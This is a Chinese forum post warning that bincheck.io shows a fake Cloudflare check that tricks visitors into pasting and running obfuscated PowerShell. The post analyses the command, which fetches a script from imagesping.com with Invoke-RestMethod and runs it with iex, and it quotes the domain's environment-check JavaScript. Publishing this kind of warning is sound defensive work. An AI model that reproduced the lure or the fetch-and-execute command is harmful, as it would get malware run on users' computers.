全球主机交流论坛

标题: 定向投毒：bincheck.io 伪装验证码诱导执行 PowerShell 远程加载 [打印本页]

作者: madact 时间: 2026-2-25 09:48
标题: 定向投毒：bincheck.io 伪装验证码诱导执行 PowerShell 远程加载
近期在访问 BIN 查询站点 https://bincheck.io/zh 时，页面出现异常“Cloudflare 验证”，并提示执行以下操作：

Win + R
Ctrl + V
Enter
该流程并非正常验证码行为，而是诱导用户在本机执行 PowerShell 命令。

命令分析结果：

使用大小写混淆
通过 FunctionName + Substring 拼接真实命令
实际执行逻辑为：
Invoke-RestMethod imagesping.com
→ iex 执行返回内容

即从远程服务器下载脚本并直接执行。

进一步测试发现：

直接浏览器访问 imagesping.com 仅返回简单 JS 代码：

{if(nav.vendor==undefined){done(" not available ");};

说明该域名存在访问环境判断机制，仅在特定条件下返回真实 payload。这属于典型的 staged loader 投递行为。
(, 下载次数: 2)

欢迎光临全球主机交流论坛 (https://loc.528866.xyz/)